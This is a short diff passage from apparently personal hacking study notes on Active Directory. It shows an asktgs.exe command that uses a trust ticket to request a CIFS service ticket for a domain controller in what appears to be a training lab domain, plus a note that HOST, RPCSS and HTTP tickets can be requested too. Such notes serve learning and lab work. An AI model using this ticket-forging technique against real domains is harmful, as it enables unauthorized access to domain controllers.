piriya-muaithaisong/Hacking-Note/Active-Directory/AD/Priv.md

 ```powershell
 .\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
 ```
+> Tickets for other services (like HOST and RPCSS for WMI, HOST and HTTP for PowerShell Remoting and WinRM) can be created as well

 4. Use the TGS to access the targeted service (may need to use it twice)
 ```powershell